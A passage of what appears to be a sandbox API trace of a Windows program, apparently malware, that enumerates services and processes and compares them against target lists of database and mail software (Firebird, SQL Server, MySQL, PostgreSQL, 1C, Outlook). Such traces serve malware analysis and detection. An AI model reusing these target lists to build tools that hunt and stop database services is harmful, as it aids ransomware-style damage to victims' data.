lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0043.192] CloseServiceHandle (hSCObject=0x680350) returned 1 [0043.192] lstrlenW (lpString="Appinfo") returned 7 [0043.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0043.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0043.192] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0043.192] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0043.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0043.192] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0043.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0043.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0043.192] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0043.192] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0043.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0043.192] lstrlenW (lpString="AudioSrv") returned 8 [0043.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0043.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0043.192] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0043.192] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0043.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0043.192] lstrlenW (lpString="BFE") returned 3 [0043.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0043.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0043.192] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0043.192] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0043.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0043.192] lstrlenW (lpString="CryptSvc") returned 8 [0043.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0043.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0043.193] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0043.193] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0043.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0043.193] lstrlenW (lpString="CscService") returned 10 [0043.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0043.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0043.193] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0043.193] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0043.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0043.193] lstrlenW (lpString="DcomLaunch") returned 10 [0043.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0043.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0043.193] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0043.193] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0043.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0043.193] lstrlenW (lpString="Dhcp") returned 4 [0043.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0043.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0043.193] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0043.193] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0043.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0043.193] lstrlenW (lpString="Dnscache") returned 8 [0043.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0043.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0043.194] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0043.194] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0043.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0043.194] lstrlenW (lpString="DPS") returned 3 [0043.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0043.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0043.194] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0043.194] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0043.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0043.194] lstrlenW (lpString="eventlog") returned 8 [0043.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0043.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0043.194] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0043.194] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0043.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0043.194] lstrlenW (lpString="EventSystem") returned 11 [0043.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0043.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0043.194] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0043.195] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0043.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0043.195] lstrlenW (lpString="gpsvc") returned 5 [0043.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0043.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0043.195] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0043.195] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0043.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0043.195] lstrlenW (lpString="iphlpsvc") returned 8 [0043.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0043.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0043.195] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0043.195] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0043.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0043.195] lstrlenW (lpString="LanmanServer") returned 12 [0043.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0043.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0043.195] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0043.195] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0043.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0043.195] lstrlenW (lpString="LanmanWorkstation") returned 17 [0043.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0043.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0043.195] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0043.195] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0043.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0043.195] lstrlenW (lpString="lmhosts") returned 7 [0043.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0043.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0043.195] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0043.195] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0043.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0043.195] lstrlenW (lpString="MMCSS") returned 5 [0043.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0043.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0043.196] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0043.196] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0043.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0043.196] lstrlenW (lpString="MpsSvc") returned 6 [0043.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0043.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0043.196] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0043.196] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0043.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0043.196] lstrlenW (lpString="Netman") returned 6 [0043.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0043.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0043.196] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0043.196] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0043.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0043.196] lstrlenW (lpString="netprofm") returned 8 [0043.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0043.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0043.196] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0043.196] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0043.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0043.196] lstrlenW (lpString="NlaSvc") returned 6 [0043.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0043.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0043.196] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0043.196] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0043.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0043.196] lstrlenW (lpString="nsi") returned 3 [0043.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0043.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0043.196] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0043.196] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0043.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0043.197] lstrlenW (lpString="PcaSvc") returned 6 [0043.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0043.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0043.197] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0043.197] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0043.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0043.197] lstrlenW (lpString="PlugPlay") returned 8 [0043.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0043.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0043.197] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0043.197] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0043.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0043.197] lstrlenW (lpString="Power") returned 5 [0043.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0043.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0043.197] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0043.197] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0043.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0043.197] lstrlenW (lpString="ProfSvc") returned 7 [0043.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0043.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0043.197] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0043.197] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0043.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0043.197] lstrlenW (lpString="RpcEptMapper") returned 12 [0043.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0043.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0043.197] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0043.197] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0043.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0043.197] lstrlenW (lpString="RpcSs") returned 5 [0043.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0043.198] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0043.198] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0043.198] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0043.198] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0043.198] lstrlenW (lpString="SamSs") returned 5 [0043.198] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0043.198] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0043.198] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0043.198] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0043.198] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0043.198] lstrlenW (lpString="Schedule") returned 8 [0043.198] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0043.198] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0043.198] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0043.198] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0043.198] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0043.198] lstrlenW (lpString="SENS") returned 4 [0043.199] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0043.199] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0043.199] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0043.199] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0043.199] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0043.199] lstrlenW (lpString="ShellHWDetection") returned 16 [0043.199] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0043.199] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0043.199] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0043.199] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0043.199] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0043.199] lstrlenW (lpString="Spooler") returned 7 [0043.199] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0043.207] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0043.207] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0043.207] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0043.207] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0043.207] lstrlenW (lpString="SysMain") returned 7 [0043.207] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0043.207] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0043.207] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0043.207] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0043.207] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0043.207] lstrlenW (lpString="Themes") returned 6 [0043.207] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0043.207] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0043.207] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0043.207] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0043.207] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0043.207] lstrlenW (lpString="TrkWks") returned 6 [0043.207] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0043.207] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0043.207] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0043.208] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0043.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0043.208] lstrlenW (lpString="UxSms") returned 5 [0043.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0043.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0043.208] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0043.208] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0043.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0043.208] lstrlenW (lpString="VSS") returned 3 [0043.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0043.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0043.208] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0043.208] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0043.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0043.208] lstrlenW (lpString="WdiServiceHost") returned 14 [0043.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0043.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0043.208] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0043.208] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0043.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0043.208] lstrlenW (lpString="WdiSystemHost") returned 13 [0043.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0043.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0043.208] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0043.208] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0043.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0043.208] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0043.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0043.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0043.208] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0043.209] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0043.209] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0043.209] lstrlenW (lpString="Winmgmt") returned 7 [0043.209] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0043.209] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0043.209] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0043.209] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0043.209] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0043.209] lstrlenW (lpString="WPDBusEnum") returned 10 [0043.209] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0043.209] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0043.209] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0043.209] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0043.209] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0043.209] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3943b50 | out: hHeap=0x600000) returned 1 [0043.209] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x164 [0043.211] Process32FirstW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0043.216] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0043.216] lstrlenW (lpString="System") returned 6 [0043.216] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0043.216] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0043.216] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0043.216] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0043.217] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0043.217] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0043.217] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0043.217] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0043.217] lstrlenW (lpString="smss.exe") returned 8 [0043.217] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0043.217] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0043.217] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0043.217] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0043.217] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0043.217] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0043.217] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0043.217] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0043.218] lstrlenW (lpString="csrss.exe") returned 9 [0043.218] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0043.218] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0043.218] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0043.218] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0043.218] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0043.218] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0043.218] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0043.218] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0043.219] lstrlenW (lpString="wininit.exe") returned 11 [0043.219] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0043.219] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0043.219] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0043.219] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0043.219] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0043.219] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0043.219] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0043.219] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0043.220] lstrlenW (lpString="csrss.exe") returned 9 [0043.220] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0043.220] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0043.221] lstrlenW (lpString="winlogon.exe") returned 12 [0043.221] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0043.222] lstrlenW (lpString="services.exe") returned 12 [0043.222] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0043.222] lstrlenW (lpString="lsass.exe") returned 9 [0043.223] Process32NextW 